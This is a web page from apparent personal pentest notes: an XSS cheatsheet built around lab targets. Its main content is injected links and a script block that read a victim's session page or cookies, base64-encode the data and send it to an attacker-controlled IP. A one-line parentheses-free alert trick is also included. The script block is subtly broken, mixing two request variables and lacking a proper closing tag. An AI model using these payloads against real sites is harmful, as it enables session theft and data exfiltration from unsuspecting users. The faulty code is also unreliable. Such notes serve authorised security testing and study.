Dado1513
  • Dado1513 Pentest Notes
  • Introduction & Documentation
  • Pentesting Methodologies
  • External Recon Pentesting
  • Brute Force
  • LotL - Living off the Land
  • Pivoting Tunnelling and Port Forward
  • Active Directory
    • 🛠️Active Directory Enumeration & Attacks
    • 🛠️ACL/ACE Abuse
    • 🛠️ADCS
    • Kerberos Attack Cheatsheet
    • 🛠️Trust Attacks
  • Linux Pentesting
    • Linux Privilege Escalation
  • Windows Pentesting
    • Windows Privilege Escalation
  • Mobile Pentesting
    • 🛠️Android Application Pentesting
    • 🛠️iOS Application Pentesting
  • Cloud Pentest
    • 🛠️Cloud Pentesting
  • Wireless Pentesting
    • 🛠️WiFi Pentesting
  • Web Pentesting
    • 🛠️XSS Cheatsheet
    • 🛠️SQL Injection
  • OSINT
    • Google Dorks
  • Network Services Pentest
    • Attacking Common Services
    • 🛠️139,445 SMB
    • 🛠️161,162,10161,10162- Pentesting SNMP
    • 🛠️winrm
  • Tools
    • NetExec
    • chisel
    • bloodyAD
    • PowerView
    • certipy
    • sqlmap
    • mimikatz
    • mSFVenom Cheatsheet
    • Ligolo-ng
    • Rubeus
    • ldapsearch
Powered by GitBook
On this page
  • Perform GET/POST request on victim session
  • XSS without parentheses
  • Resources
  1. Web Pentesting

XSS Cheatsheet

Perform GET/POST request on victim session

<a href='javascript: fetch("http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php") .then(response => response.text()) .then(data => fetch("http://10.10.14.16/", { method: "POST", headers: { "Content-Type": "application/x-www-form-urlencoded" }, body: "d=" + encodeURIComponent(btoa(unescape(encodeURIComponent(data)))) }));'>XSS test</a>
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open("get","https://alert.htb/index.php?page=messages",true);
var attacker = "http://10.10.14.16/cookie="
xhr.onreadystatechange = function () {
    if (xhr.readyState == XMLHttpRequest.DONE) {
      fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
    }
  }
req.send();
<script>
<a href="javascript:fetch('http://10.10.14.16/?d='+encodeURIComponent(btoa(document.cookie)));">XSS test </a>

XSS without parentheses

alert`1`

Resources

  • https://portswigger.net/research/xss-without-parentheses-and-semi-colons

PreviousWiFi PentestingNextSQL Injection

Last updated 2 months ago

🛠️